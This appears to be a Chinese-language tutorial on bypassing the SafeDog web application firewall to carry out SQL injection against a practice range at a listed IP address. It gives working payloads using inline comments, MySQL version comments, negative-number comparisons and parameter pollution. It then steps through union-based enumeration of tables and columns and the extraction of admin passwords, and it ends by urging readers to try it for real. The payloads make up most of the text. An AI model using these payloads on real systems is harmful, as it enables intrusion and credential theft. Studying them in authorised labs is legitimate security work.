绕安全狗总结

安全狗靶场

http://59.63.200.79:8014/?id=1

在绕过之前，我需要说明我的注入方法简化说明。

一个注入点我分为六个步骤去完成注入操作：

一、判断是否存在注入

二、当前页面有几个字段，是否有回显

三、利用回显点，遍历表名

四、利用表名，遍历字典

五、输出数据

安全狗绕过

判断是否存在注入

一般来说都是判断and 1=1(2)来判断有无注入点

发现有狗狗

这时就要判断狗狗是咬住了哪个词

发现是and于是我在这理讲讲绕过狗狗的几个方法：

方式一、

Playload: http://59.63.200.79:8014/?id=1 %23a&a0/*and*/ 1=1 --+

返回是正常的

这里讲讲原理：

我们这里是因为and被匹配被咬了但是我们使用aand却不会

所以我们可以用内敛注释把and包起来，然后前面加个a然后把这个a和and分开并且把a给注释掉这样就可以既绕过狗狗也可以执行我们的命令

%23a%0a/*and*/到后端就是这样的：

a #

and

这样可以绕狗

方式二、

Playload: http://59.63.200.79:8014/?id=1 /*!44509and*/ 1=1 --+

也能绕过

原理：

这个绕过是根据mysql数据库版本判断来绕过狗狗

/*!数据库版本+命令*/

当数据库版本大于这个44509（playload里的）时就会去执行后面的命令

这样也可以绕狗

方式三(针对靶场不适用于全部狗狗)、

这个靶场中因为狗狗没有匹配负数而导致的绕过

Playload：http://59.63.200.79:8014/?id=1 and -1=-1 --+

方式四（参数污染）、

?Id=1的站点可以尝试?Id=1&id=2 数据库会执行后面的id=2

如果这样会执行成功的话，可以尝试做一些小操作

/*%0a&id=1%20and%20-1=-2%20union%20select%201,password%20from%20admin%23*/

注：然后在书上还有phpline和分块传输绕过

这里因为时间原因就不实战了（当然也不知道行不行）

如果想了解更多姿势就百度把哈哈哈

然后我们这边就按照注入流程把他库名啥的爆出来把

3的话回显错误所以字段为二

Playload：http://59.63.200.79:8014/?id=1 /*!44509order*/ by 2 --+

Playload: http://59.63.200.79:8014/?id=1 and -1=-2 union /*!10044select*/1,2--+(因为这里安全狗匹配的是union select)

三、利用回显点，输出表

payload：and -1=-2 union/*!10044select*/1,table_name--+/*%0afrom information_schema.tables where table_schema=database()%23*/

本行绕过手法用到了内敛注释+版本号和注释符里逃逸

换行=%0a

#=%23

查询到了admin表

四、查admin表中到字段

payload：

and -1=-2 union/*!10044select*/1,column_name--+/*%0afrom information_schema.columns where table_schema=database() limit 2,1%23*/

五、查password字段数据

and -1=-2 union/*!10044select*/1,password--+/*%0afrom admin%23*/

看完记得去实战！！

纸上得来终觉浅，绝知此事要躬行！